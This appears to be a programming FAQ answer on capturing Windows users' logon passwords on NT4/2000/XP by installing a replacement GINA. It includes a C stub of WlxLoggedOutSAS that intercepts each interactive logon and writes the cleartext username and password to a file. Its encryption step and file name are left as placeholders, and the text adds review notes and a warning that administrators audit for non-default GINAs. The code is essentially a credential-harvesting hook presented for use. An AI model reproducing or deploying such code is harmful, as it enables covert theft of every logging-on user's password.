How do I grab the user's password under NT4/2000/XP?

Microsoft actually documents how to do this (it's a common requirement for programs which need to log into a database using the user's own security credentials).

Warning - this code is not functional under Vista/Windows 7/Server 2008

Vista, Server 2008 and Windows 7 use a different authentication provider architecture, so this approach doesn't work anymore. Sorry.

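Look at the GINASTUB sample which comes with the Win32 Platform SDK. Essentially, the technique consists of replacing the default GINA with your own, then having your GINA LoadLibrary the default one and call its entry points as required, grabbing the data as it flies past. I have reproduced the important function here, with my own code added for saving the username and password to a file in ANSI format. Because a replacement GINA is loaded by Winlogon and sees every interactive logon's credentials in cleartext, a non-default GINA on a machine is something administrators should audit for, and any file the captured data lands in has to be protected as tightly as the credentials themselves.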

/*
 * WlxLoggedOutSAS - stub GINA entry point that forwards the call to
 * GWlxLoggedOutSAS and, when the result is WLX_SAS_ACTION_LOGON, copies the
 * user name and password from pMprNotifyInfo into a file.
 *
 * Parameters: all eight arguments are passed to GWlxLoggedOutSAS unchanged;
 *             only pMprNotifyInfo is read afterwards by this function.
 * Returns:    the value returned by GWlxLoggedOutSAS, unmodified.
 *
 * NOTE(review): GWlxLoggedOutSAS is presumably the default GINA's
 * WlxLoggedOutSAS, resolved elsewhere in the sample - confirm against the
 * full source. iRet is not declared in this listing; presumably it is
 * declared elsewhere in the full sample.
 *
 * Security notes for reviewers:
 *  - The credentials are handled in cleartext. The only protection is the
 *    encryption placeholder below, which is not code; as listed, nothing is
 *    encrypted before the write.
 *  - szUserName, szPassword and szBuffer are never cleared, so the cleartext
 *    password is still in these stack buffers when the function returns.
 *  - No return value from WideCharToMultiByte, wsprintf or WriteFile is
 *    checked.
 */
int WINAPI WlxLoggedOutSAS (PVOID   pWlxContext,
                            DWORD   dwSasType,
                            PLUID   pAuthenticationId,
                            PLUID   pLogonSid,
                            PDWORD  pdwOptions,
                            PHANDLE phToken,
                            PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,
                            PVOID  *pProfile)
{
   HANDLE hFile ;
   DWORD dwBytesWrit ;
   /* Fixed-size buffers: 64 elements each for name and password, 130 for the
      combined "name,password\n" line. */
   TCHAR szBuffer [130];
   TCHAR szUserName [64];
   TCHAR szPassword [64];

   /* Forward the call first; everything below only acts on its result. */
   iRet = GWlxLoggedOutSAS (pWlxContext,
                            dwSasType,
                            pAuthenticationId,
                            pLogonSid,
                            pdwOptions,
                            phToken,
                            pMprNotifyInfo,
                            pProfile);
   if (iRet == WLX_SAS_ACTION_LOGON) 
   {
      /* Convert the wide-character user name to the ANSI code page.
         The return value is ignored, so a name that does not fit in the
         buffer is not detected here.
         NOTE(review): sizeof gives a byte count and the destination is
         declared TCHAR; this is only consistent in a non-UNICODE build -
         confirm the build settings. */
      WideCharToMultiByte (CP_ACP, 0,
                           pMprNotifyInfo->pszUserName,
                           -1,
                           szUserName,
                           sizeof (szUserName),
                           NULL,
                           NULL);
      /* Same conversion for the password; the same caveats apply. */
      WideCharToMultiByte (CP_ACP, 0,
                           pMprNotifyInfo->pszPassword,
                           -1,
                           szPassword,
                           sizeof (szPassword),
                           NULL,
                           NULL);
      /* Build a single "name,password\n" record. The write into szBuffer is
         not bounded by szBuffer's size; it relies on both inputs being
         NUL-terminated within their 64-element buffers. */
      wsprintf (szBuffer, "%s,%s\n",
                szUserName,
                szPassword);
      /* Placeholder from the original article, not compilable code. */
      < insert code here to encrypt the data in szBuffer >
      /* The file name is also a placeholder. CREATE_ALWAYS replaces any
         existing file, share mode 0 denies concurrent opens, and the NULL
         security attributes mean the file gets a default security
         descriptor rather than an explicitly restricted one. */
      hFile = CreateFile (<Some unique filename in a fixed location >,
                          GENERIC_WRITE,
                          0,
                          NULL,
                          CREATE_ALWAYS,
                          FILE_ATTRIBUTE_NORMAL,
                          NULL);
      if (hFile != INVALID_HANDLE_VALUE)
      {
         /* Write the record up to its NUL terminator; the result of
            WriteFile and dwBytesWrit are not examined. */
         WriteFile (hFile, 
                    (LPCVOID)(szBuffer),
                    (DWORD)(strlen (szBuffer)), 
                    &dwBytesWrit,
                    NULL);
         CloseHandle (hFile);
      }
   }
   /* Hand the forwarded call's result back to the caller unchanged. */
   return iRet;
}
